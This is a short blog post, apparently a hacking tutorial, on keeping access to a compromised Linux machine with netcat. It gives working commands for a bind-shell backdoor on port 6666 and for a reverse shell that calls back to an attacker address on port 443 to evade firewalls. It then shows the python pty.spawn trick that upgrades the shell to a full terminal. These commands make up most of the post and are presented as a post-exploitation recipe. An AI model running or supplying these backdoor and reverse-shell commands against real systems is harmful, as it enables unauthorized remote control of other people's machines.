Wednesday, August 22, 2012

Reverse terminals

After compromising a target machine it's time for some post exploitation using a backdoor.

This can be done easy with netcat. Our Swiss-army knife for TCP/IP.
 
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
There's also an enhanced version using twofish encryption, called cryptcat. For this exercise we are using the older netcat.

Compromised machine: 10.0.1.50
Attacker's machine: 10.0.1.100

First of all, we need to download and install a custom netcat version on our compromised target machine. Make sure to also download some compiling tools like gcc.

apt-get install libc6-dev g++ gcc
wget http://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.bz2
tar -xjvf netcat-0.7.1.tar.bz2
cd netcat-0.7.1
./configure
make
make install


After netcat has been installed and compiled we can use the following command on our target machine to create a backdoor listener:

./netcat -l -p 6666 -e /bin/bash

This spawns a command shell on TCP port 6666.



It's now possible for an attacker to connect from a remote machine to our compromised target, using netcat as a client this time.

netcat 10.0.1.50 6666

We are getting a command shell:



Our post exploitation tool is working!

When the compromised machine is after a firewall this can be a problem.
A firewall is actually blocking ports... remember? :-)

Another possibility is using a reverse shell with netcat.
In a reverse shell, the connection is actually triggered by the compromised machine. It connects back to the attacker's machine. We might use this technique to circumvent the firewall or NAT installation. Use a standard port that you think will be allowed through the firewall: ports 443, 80 and 53 are often good options.

The following command starts a listener on port TCP 443 of the attacker's machine:

nc -l -p 443



On our target machine we use netcat with the following syntax:

./netcat 10.0.1.100 443 -e /bin/bash



This spawns a shell in a reverse way to the attacker on port TCP 443. That's an outbound connection.



Cool! We circumvented the firewall.

Another issue is that a shell is not a real terminal. There's a big difference between a shell and a terminal. There are some commands that don't work in a shell.

Try 'top'...
Not working...



And here comes another piece of magic when we enter the following command in our shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Our shell became a real terminal, a reverse terminal:

 
 
Our 'top' command is working:



Awesome, and easy.

In this post we used netcat as a post exploitation tool spawning a reverse terminal.